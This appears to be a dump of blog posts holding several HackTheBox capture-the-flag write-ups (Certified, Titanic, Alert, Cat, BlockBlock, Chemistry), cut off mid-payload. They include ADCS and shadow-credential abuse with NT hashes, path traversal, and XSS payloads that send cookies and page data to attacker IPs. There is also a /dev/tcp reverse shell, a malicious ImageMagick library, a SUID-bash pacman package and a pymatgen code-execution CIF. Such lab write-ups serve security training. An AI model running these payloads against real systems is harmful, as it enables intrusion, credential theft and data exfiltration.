group members \"Management\" -U \"certified.htb/judith.mader%judith09\" -S \"10.10.11.41\" CERTIFIED\\judith.mader CERTIFIED\\management_svc ``` ### Shadow Credentials | GenericWrite Una vez que estemos en el grupo ManagementGroup tendremos alcance a Management_svc mediante el GenericWrite. ![Image](image-24.png) ```zsh python3 pywhisker.py -d \"certified.htb\" -u \"judith.mader\" -p \"judith09\" --target \"management_svc\" --action \"add\" ``` ![Image](image-25.png) ```zsh certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.10.11.41 ``` ```zsh Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user 'management_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '4cb7a6f2-3dbf-732b-8d3b-73d19a794c68' [*] Adding Key Credential with device ID '4cb7a6f2-3dbf-732b-8d3b-73d19a794c68' to the Key Credentials for 'management_svc' [*] Successfully added Key Credential with device ID '4cb7a6f2-3dbf-732b-8d3b-73d19a794c68' to the Key Credentials for 'management_svc' [*] Authenticating as 'management_svc' with the certificate [*] Using principal: management_svc@certified.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'management_svc.ccache' [*] Trying to retrieve NT hash for 'management_svc' [*] Restoring the old Key Credentials for 'management_svc' [*] Successfully restored the old Key Credentials for 'management_svc' [*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584 ``` ```zsh netexec smb DC01 -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584' ``` ![Image](image-26.png) WinRM ![Image](image-27.png) _Pwned_ ## Shell as Management_svc ```bash evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 ``` ![Image](image-28.png) #### Certified Template attack | ca_operator Muy bien, ahora que puedo autenticarme exitosamente como management_svc, necesito cambiar a ca_operator, ya que ADCS está activo y tengo GenericAll sobre ca_operator, puedo obtener su hash usando certipy shadow. ```zsh certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.10.11.41 ``` Obtuvimos el hash de ca_operator / b4b86f45c6018f1b664f70805f45d8f2. Ahora validaremos si es posible logearse con winrm. ```zsh netexec smb DC01 -u 'ca_operator' -H 'b4b86f45c6018f1b664f70805f45d8f2' ``` ![Image](image-29.png) ![Image](image-30.png) Como no es posible logearse en winrm con las credenciales, ahora voy a comprobar si hay plantillas vulnerables usando certipy. ## PrivEsc to Administrator | Active Directory Certificate Services (AD CS) ```zsh certipy find -vulnerable -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout -vulnerable ``` ![Image](image-31.png) ### ESC9 - Certipy ¡Buenas y malas noticias! Tenemos una plantilla vulnerable, pero es ESC9. ESC9 es un poco más complicado, eso es todo. Podemos explotarla usando este artículo. [Certipy 4.0: ESC9 & ESC10](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7) Primero, necesito cambiar el UPN(User Principal Name) de ca_operators a Administrador. ```zsh certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator ``` ![Image](image-32.png) ![Image](image-33.png) Ahora necesitamos solicitar la plantilla vulnerable como ca_operator. ```zsh certipy req -username ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.10.11.41 ``` ![Image](image-34.png) Ahora podemos cambiar el upn nuevamente. ```zsh certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_operator': userPrincipalName : ca_operator@certified.htb [*] Successfully updated 'ca_operator' ``` Por último, pero no menos importante, podemos intentar iniciar sesión y robar el hash NTLM del administrador. ```zsh certipy auth -pfx ../administrator.pfx -domain certified.htb ``` ![Image](image-35.png) `aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34` ```zsh evil-winrm -i certified.htb -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 ``` ![Image](image-36.png) - Active Directory enumeration with Bloodhound - Active Directory enumeration with Certipy - Active Directory ACL and DACL abuse - Exploiting ADCS misconfigurations"},{"id":"titanic","title":"HTB - Titanic","description":"HTB - Titanic","date":"2025-02-02T16:17:34.000Z","tags":["HackTheBox","ffuf","gitea","db","SQL","ImageMagick","Path-Traversal"],"authors":["r4cc0x"],"url":"/blog/titanic","content":"## Box Info | Name | Titanic | | :-------------------- | ---------------: | | Release Date | 15 Feb, 2025 | | OS | Linux | | Rated Difficulty | Easy | ```bash ping -c 3 10.10.11.55 PING 10.10.11.55 (10.10.11.55) 56(84) bytes of data. 64 bytes from 10.10.11.55: icmp_seq=1 ttl=63 time=57.8 ms 64 bytes from 10.10.11.55: icmp_seq=2 ttl=63 time=58.1 ms 64 bytes from 10.10.11.55: icmp_seq=3 ttl=63 time=59.0 ms --- 10.10.11.55 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 1999ms rtt min/avg/max/mdev = 57.766/58.289/58.979/0.508 ms ``` ```bash sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.11.55 -oG allPorts ``` ```bash sudo] password for kali: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 19:42 EST Initiating SYN Stealth Scan at 19:42 Scanning 10.10.11.55 [65535 ports] Discovered open port 22/tcp on 10.10.11.55 Discovered open port 80/tcp on 10.10.11.55 Completed SYN Stealth Scan at 19:43, 13.26s elapsed (65535 total ports) Nmap scan report for 10.10.11.55 Host is up, received user-set (0.058s latency). Scanned at 2025-03-05 19:42:54 EST for 13s Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds Raw packets sent: 65951 (2.902MB) | Rcvd: 65549 (2.622MB) ``` ```bash nmap -p 22,80 -sCV 10.10.11.55 -oN targeted ``` ```bash Host is up (0.059s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA) |_ 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Did not follow redirect to http://titanic.htb/ |_http-server-header: Apache/2.4.52 (Ubuntu) Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```ruby whatweb http://titanic.htb http://titanic.htb [200 OK] Bootstrap[4.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/3.0.3 Python/3.10.12], IP[10.10.11.55], JQuery, Python[3.10.12], Script, Title[Titanic - Book Your Ship Trip], Werkzeug[3.0.3] ``` ![Image](image.png) ![Image](image-1.png) ```bash ffuf -c -u \"http://titanic.htb\" -H \"host: FUZZ.titanic.htb\" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,300,303 ``` ![Image](image-2.png) ```bash dirsearch -u http://dev.titanic.htb ``` ![Image](image-3.png) version of gitea ![Image](image-4.png) Explore the repository of developer we find tickets ![Image](image-5.png) also we have emails and users ```bash response.text()).then(data=>fetch(\"http://10.10.15.36:1111/?d=\"+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>XSS test ``` But we dont get anything with that so i will inspect again the web and try to catch the request of book your trip ### Path Traversal Intercept this request ![Image](image-6.png) we will get this request and will try to path traversal ![Image](image-7.png) ![Image](image-8.png) we have a one user has bash ```bash developer:x:1000:1000:developer:/home/developer:/bin/bash ``` now we will look the database file of gitea, where we can found on `/home/user/gitea/data/gitea/gitea.db` ![Image](image-9.png) developer@titanic.htb root@titanic.htb ```bash curl -s --path-as-is \"http://titanic.htb/download?ticket=../../../../../../../../home/developer/gitea/data/gitea/gitea.db\" -o gitea.db ``` ```bash sqlite3 gitea.db ``` ``` .tables ``` ```bash SELECT * FROM users; ``` ![Image](image-10.png) ```r 1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0 2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0 ``` ```bash SELECT lower_name, passwd, salt FROM user; ``` ``` administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|2d149e5fbd1b20cf31db3e3c6a28fc9b developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|8bf3e3452b78544f8bee9400d6936d34 ``` we cant directly crack the hash with hashcat, so we gonna use the script gitea2hashcat.py for convert to sha256 ``` python3 gitea2hashcat.py ``` ```r administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= ``` ```bash hashcat -m 10900 gitea_hash.txt /usr/share/wordlists/rockyou.txt --username ``` ![Image](image-11.png) Password: ``` 25282528 ``` ![Image](image-12.png) ![Image](image-13.png) we found a folder scripts where has a script with follow commands: ``` cd /opt/app/static/assets/images truncate -s 0 metadata.log find /opt/app/static/assets/images/ -type f -name \"*.jpg\" | xargs /usr/bin/magick identify >> metadata.log ``` use magick -version we look the version has a vulnerability arbitrary code explotation https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8 ```bash magick -version Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org Copyright: (C) 1999 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.5) Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib Compiler: gcc (9.4) ``` we make a file on `/opt/app/static/assets/images` and waiting the script run the file for create and move the file root.txt to tmp. ![Image](image-14.png) ```bash gcc -x c -shared -fPIC -o ./libxcb.so.1 - #include __attribute__((constructor)) void init(){ system(\"cat /root/root.txt > /tmp/root.txt\"); exit(0); } EOF ``` ![Image](image-15.png) Also we can embedded a reverse shell"},{"id":"alert","title":"HTB - Alert","description":"HTB - Alert","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","XSS","hashcat","Misconfiguration"],"authors":["r4cc0x"],"url":"/blog/alert","content":"## Box Info | Name | Alert | | :-------------------- | ---------------: | | Release Date | 21 Dec, 2024 | | OS | Linux | | Rated Difficulty | Easy | Identify if machine is active ![Image](image.png) ### Reconnaissance ```java sudo nmap -sCV -p 22,80 10.10.11.44 -oN targeted ``` ```java # Nmap 7.95 scan initiated Tue Mar 4 14:58:26 2025 as: /usr/lib/nmap/nmap -sCV -p 22,80 -oN targeted 10.10.11.44 Nmap scan report for 10.10.11.44 (10.10.11.44) Host is up (0.058s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA) | 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA) |_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://alert.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Mar 4 14:58:36 2025 -- 1 IP address (1 host up) scanned in 9.77 seconds ``` ```bash echo \"10.10.11.44 alert.htb\" | sudo tee -a /etc/hosts ``` ![Image](image-1.png) ![Image](image-2.png) ### Local File Read https://fluidattacks.com/advisories/noisestorm/ ```bash fetch(\"http://alert.htb/messages.php\") .then(response => response.text()) .then(data => { fetch(\"http://10.10.15.36:7000/?data=\" + encodeURIComponent(data)); }) ``` vulnerability ```bash fetch(\"http://alert.htb/messages.php?file=../../../../etc/apache2/sites-available/000-default.conf\") .then(response => response.text()) .then(data => { fetch(\"http://10.10.15.36:7000/?data=\" + encodeURIComponent(data)); }) .catch(error => console.error(\"Error fetching the messages:\", error)); ``` ![Image](image-3.png) ![Image](image-4.png) ![Image](image-5.png) ![Image](image-6.png) ( albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/ ) ```bash hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt --username -o pass.txt ``` ```bash albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited ``` ```bash emily@alert.htb $839 jonathan@alert.htb $829 robert@alert.htb $819 raquel@alert.htb $809 mario@alert.htb $799 amayrani@alert.htb $789 axel@alert.htb $759 sofia@alert.htb $749 john@alert.htb $739 mary@alert.htb ``` ```bash netstat -nltp ``` ![Image](image-7.png) ```bash ssh -L 9090:localhost:8080 albert@10.10.11.44 ``` ![Image](image-8.png) path of website monitor `/opt/website-monitor/` if can edit the file configuration.php on path of website-monitor can run command as root can chek this with command `ps aux` ![Image](image-9.png) ![Image](image-10.png) ![Image](image-12.png)"},{"id":"cat","title":"HTB - Cat","description":"HTB - Cat","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","SQLi","XSS-Blind","Pivoting","Decrypt"],"authors":["r4cc0x"],"url":"/blog/cat","content":"## Box Info | Name | Cat | | :-------------------- | ---------------: | | Release Date | 1 Feb, 2025 | | OS | Linux | | Rated Difficulty | Medium | ```bash sudo nmap -p 22,80 -T5 -sCV 10.10.11.53 -oN targeted Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 22:43 CST Nmap scan report for 10.10.11.53 (10.10.11.53) Host is up (0.059s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA) | 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA) |_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://cat.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds ``` ```bash echo \"10.10.11.53 cat.htb\" | sudo tee -a /etc/hosts 10.10.11.53 cat.htb ``` ![Image](image.png) registry and login We can acces to file upload section ![Image](image-1.png) use git_dumper.py for get the all files from .git directory web ![Image](image-2.png) ![Image](image-3.png) XSS Stored we see a user ![Image](image-4.png) we see unsanitized input on username and email that stored directly to database ![Image](image-5.png) This can lead to a stored XSS attack. ```ruby alert(document.cookie) ``` SQL Injection **accept_cat.php** ```php exec($sql_insert); $stmt_delete = $pdo->prepare(\"DELETE FROM cats WHERE cat_id = :cat_id\"); $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT); $stmt_delete->execute(); echo \"The cat has been accepted and added successfully.\"; } else { echo \"Error: Cat ID or Cat Name not provided.\"; } } else { header(\"Location: /\"); exit(); } } else { echo \"Access denied.\"; } ?> ``` This can to be used for delete the entire table: `catName = '); DROP TABLE accepted_cats; --` But we need to be axel for exploit the SQL injection **contest.php** ![Image](image-6.png) ### XSS Blind For exploit the sql we need to retrieve the cookie of admin, the admin is axel, so we gonna make a payload for register and send the contest for admin instant run the payload and retrieves of her cookie. ```python document.location='http://10.10.14.3:4444/?c='+document.cookie; ``` ![Image](image-7.png) ![Image](image-8.png) (try a few times, sometimes take a large time) ![Image](image-9.png) F5 reload the web and i can see the new section \"Admin\" ![Image](image-10.png) Remember we have a sql injection exploit in section accept_cats.php ![Image](image-11.png) ```bash sqlmap -r sqli-accept_cat.req -p catName --level=5 --tables --dump --risk=3 --dbms=sqlite --threads=10 ``` ![Image](image-12.png) (For make it works we need to make to fast) ![Image](image-13.png) ![Image](image-14.png) ![Image](image-15.png) ![Image](image-16.png) `soyunaprincesarosa` look the log from apache2 ![Image](image-17.png) `axel` `aNdZwgC4tI9gnVXv_e3Q` look the mail of axel ![Image](image-18.png) ![Image](image-19.png) ## Tunneling | Pivoting ```bash chisel server -p 5678 --reverse ``` ```bash chisel client 10.10.14.27:5678 R:3000:127.0.0.1:3000 ``` login as axel with the credentials ![Image](image-20.png) Gitea version 1.22 has a Stored XSS exploit ![Image](image-21.png) Create repository ```bash XSS test ``` ![Image](image-22.png) send email ```bash echo -e \"Subject: Test Email\\n\\nHello, check repo http://localhost:3000/axel/test2\" | sendmail jobert@cat.htb ``` ![Image](image-23.png) I tried to read the README.md ```bash response.text()).then(data=>fetch(\"http://10.10.14.27:4444/?d=\"+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>XSS test ``` Decrypt ![Image](image-24.png) Nothing interesting information I tried to acces index.php since it is the most common path (index.php) ```ruby response.text()).then(data=>fetch(\"http://10.10.14.27:1111/?d=\"+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>XSS test ``` ![Image](image-25.png) ![Image](image-26.png) Cyberchef descrypt from base64 ![Image](image-27.png) `admin` `IKw75eR0MR7CMIxhH0` ![Image](image-28.png)"},{"id":"blockblock","title":"HTB - BlockBlock","description":"HTB - BlockBlock","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","Decentralized","API","Solidity","XSS","Ethereum","Decode","Misconfiguration"],"authors":["r4cc0x"],"url":"/blog/blockblock","content":"## Box Info | Name | BlockBlock | | :-------------------- | ---------------: | | Release Date | 16 Nov, 2024 | | OS | Linux | | Rated Difficulty | Hard | ## Enumeration ```bash sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.11.43 -oG allPorts ``` ```bash [sudo] password for kali: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 23:01 EST Initiating SYN Stealth Scan at 23:01 Scanning 10.10.11.43 [65535 ports] Discovered open port 80/tcp on 10.10.11.43 Discovered open port 22/tcp on 10.10.11.43 Discovered open port 8545/tcp on 10.10.11.43 Completed SYN Stealth Scan at 23:02, 17.19s elapsed (65535 total ports) Nmap scan report for 10.10.11.43 Host is up, received user-set (0.11s latency). Scanned at 2025-03-08 23:01:51 EST for 17s Not shown: 61578 closed tcp ports (reset), 3954 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 8545/tcp open unknown syn-ack ttl 63 ``` ```sh nmap -p 22,80,8545 -sCV 10.10.11.43 -oN targeted ``` ```sh Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 23:03 EST Nmap scan report for 10.10.11.43 Host is up (0.089s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA) |_ 256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519) 80/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3) |_http-title: Home - DBLC |_http-server-header: Werkzeug/3.0.3 Python/3.12.3 8545/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3) |_http-server-header: Werkzeug/3.0.3 Python/3.12.3 |_http-title: Site doesn't have a title (text/plain; charset=utf-8). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds ``` ```sh whatweb http://10.10.11.43 ``` ```r http://10.10.11.43 [200 OK] Access-Control-Allow-Methods[GET,POST,PUT,DELETE,OPTIONS], Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Werkzeug/3.0.3 Python/3.12.3], IP[10.10.11.43], Python[3.12.3], Script, Title[Home - DBLC][Title element contains newline(s)!], UncommonHeaders[access-control-allow-origin,access-control-allow-headers,access-control-allow-methods], Werkzeug[3.0.3] ``` ![Image](image.png) Register and login ![Image](image-1.png) there redirecting us to api - Chat.sol - Database.sol ![Image](image-2.png) ![Image](image-3.png) *Solidity 0.8.23* - https://github.com/ethereum/solidity/blob/develop/docs/bugs_by_version.json ![Image](image-4.png) ![Image](image-5.png) ``` api/get_user_messages?username=admin ``` ![Image](image-6.png) for admin path we get 401 ![Image](image-7.png) ![Image](image-8.png) ### XSS XSS in report user botton ```bash r.text()).then(dataFromA => fetch(`http://10.10.14.37/?d=${btoa(dataFromA)}`))\"> ``` ![Image](image-9.png) we recieve the admin token ![Image](image-10.png) ```js {\"role\":\"admin\",\"token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczOTI3MTg3MCwianRpIjoiOTcxYmE2ODUtNmEwMi00NDc0LWFjYjAtNTk3ZmEwYmZhNzYzIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzM5MjcxODcwLCJleHAiOjE3Mzk4NzY2NzB9.mca-qKYWjU2Z6pZEqERpGggiPn3tVGUYA1Jx4XMWO_c\",\"username\":\"admin\"} ``` `http://10.10.11.43/admin` ![Image](image-11.png) ![Image](image-12.png) ```bash curl http://10.10.11.43/api/get_user_messages?username=keira -H \"Content-Type: application/json\" -H \"Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MTY1NjI5MSwianRpIjoiNjU4YzEwNjMtMDRmOC00MWZmLTgzY2UtZDMxMzRkOTUyMDFhIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzQxNjU2MjkxLCJleHAiOjE3NDIyNjEwOTF9.FQIsVELBbwo6qmDkF8ZFQXFa13eLPcEOxuKbbDdSrcE\" -v ``` ![Image](image-13.png) /api/json-rpc /api/chat_address ![Image](image-14.png) `http://10.10.11.43/api/json-rpc` ![Image](image-15.png) ```java Authorization:65d76446778ab14fb9a7a15f6ca33703432a3d31fcf3e43ba0aa8dbc18e3fd7b ``` https://ethereum.org/en/developers/docs/apis/json-rpc/#eth_getblockbynumber https://docs.metamask.io/services/reference/ethereum/json-rpc-methods/eth_getwork/ Ethereum ```bash fetch('http://10.10.11.43/api/json-rpc',{method:'POST',headers:{'Content-Type':'application/json',\"token\":\"65d76446778ab14fb9a7a15f6ca33703432a3d31fcf3e43ba0aa8dbc18e3fd7b\"},body:JSON.stringify({jsonrpc:\"2.0\",method:\"eth_getBalance\",params:[\"0x38...6F2...\",\"latest\"],id:1})}); ``` we need receive this ![Image](image-16.png) ![Image](image-18.png) On the /admin page we open the console of ff and we use the follow code: ```bash fetch('http://10.10.11.43/api/json-rpc',{method:'POST',headers:{'Content-Type':'application/json',\"token\":\"65d76446778ab14fb9a7a15f6ca33703432a3d31fcf3e43ba0aa8dbc18e3fd7b\"},body:JSON.stringify({jsonrpc:\"2.0\",method:\"eth_getBlockByNumber\",params:[\"0xf\",true],id:1})}); ``` ![Image](image-19.png) [Ethereum](https://lab.miguelmota.com/ethereum-input-data-decoder/example/) I change the \"0xf\" to 0x0 or \"0x1\" for change the block number ```bash fetch('http://10.10.11.43/api/json-rpc',{method:'POST',headers:{'Content-Type':'application json',\"token\":\"65d76446778ab14fb9a7a15f6ca33703432a3d31fcf3e43ba0aa8dbc18e3fd7b\"},body:JSON.stringify({jsonrpc:\"2.0\",method:\"eth_getBlockByNumber\",params:[\"0x1\",true],id:1})}); ``` ![Image](image-20.png) Decode from hexadecimal ```java 0x60a060405234801561001057600080fd5b5060405161184538038061184583398101604081905261002f9161039a565b60405180606001604052808281526020016040518060400160405280600581526020016.......... ``` https://gchq.github.io/CyberChef/ ![Image](image-21.png) both of `hexa` encode ```bash 6b65697261000000000000000000000000000000000000000000000000000000 536f6d65646179426974436f696e57696c6c436f6c6c61707365000000000000 ``` keira SomedayBitCoinWillCollapse ###### Keira Sign in with ssh ![Image](image-22.png) we cant run the binary ![Image](image-23.png) ``` sudo -u paul /home/paul/.foundry/bin/forge --help ``` ![Image](image-24.png) https://book.getfoundry.sh/reference/forge/forge ![Image](image-25.png) something happens because dont get the reverse shell as paul, so we go use **build** option create a file with reverse shell in /tmp `!#/bin/bash\\nbash -i >& /dev/tcp/10.10.14.37/4444 0>&1` chmod +x soulc ```bash sudo -u paul /home/paul/.foundry/bin/forge build --use ./solc ``` ![Image](image-26.png) ##### Paul ![Image](image-27.png) `http://thecybersimon.com/posts/Privilege-Escalation-via-Pacman/` `PKGBUILD` shell script with the code provided below. `PKGBUILD` is a shell script used in Arch Linux to define how a package is built, including metadata (name, version, description), dependencies, source files, and the steps to compile/install it. It’s processed by makepkg to create an installable .pkg.tar.zst for pacman. You can read more about it on Arch Linux btw Wiki. `cd /dev/shm` ```bash echo -e \"pkgname=exp\\npkgver=1.0\\npkgrel=1\\narch=('any')\\ninstall=exp.install\" > PKGBUILD ``` ```bash echo \"post_install() { chmod 4777 /bin/bash; }\" > exp.install ``` `makepkg -s` ```bash sudo pacman -U *.zst --noconfirm ``` `bash -p` ![Image](image-28.png) ![Image](image-29.png)"},{"id":"chemistry","title":"HTB - Chemistry","description":"HTB - Chemistry","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","CVE-2024-23334","path-traversal","CVE-2024-23346","Pymatgen-Library","chisel"],"authors":["r4cc0x"],"url":"/blog/chemistry","content":"## Box Info | Name | Chemistry | | :-------------------- | ---------------: | | Release Date | 19 Oct, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ```bash sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.11.38 -oG allPorts nmap -p 22,5000,8000 -sCV 10.10.11.38 -oN targeted ``` ```bash # Nmap 7.95 scan initiated Thu Feb 27 21:23:35 2025 as: /usr/lib/nmap/nmap --privileged -p 22,5000,8000 -sCV -oN targeted 10.10.11.38 Nmap scan report for 10.10.11.38 (10.10.11.38) Host is up (0.058s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA) | 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA) |_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519) 5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5) |_http-server-header: Werkzeug/3.0.3 Python/3.9.5 |_http-title: Chemistry - Home 8000/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10) |_http-title: Directory listing for / |_http-server-header: SimpleHTTP/0.6 Python/3.8.10 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` `http://10.10.11.38:5000/` ![Image](image.png) ![Image](image-1.png) Once register and log in we identifier a upload files with CIF extension ## CVE-2024-23346 [Critical Security Flaw in Pymatgen Library (CVE-2024-23346)](https://www.vicarius.io/vsociety/posts/critical-security-flaw-in-pymatgen-library-cve-2024-23346) [Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string](https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f) Follow the proces of explotation we create 2 files with the follow code: **poc.py** ```bash from pymatgen.io.cif import CifParser parser = CifParser(\"View2.cif\") structure = parser.parse_structures() ``` **View2.cif** ```bash data_5yOhtAoR _audit_creation_date 2018-06-08 _audit_creation_method \"Pymatgen CIF Parser Arbitrary Code Execution Exploit\" loop_ _parent_propagation_vector.id _parent_propagation_vector.kxkykz k1 [0 0 0] _space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in 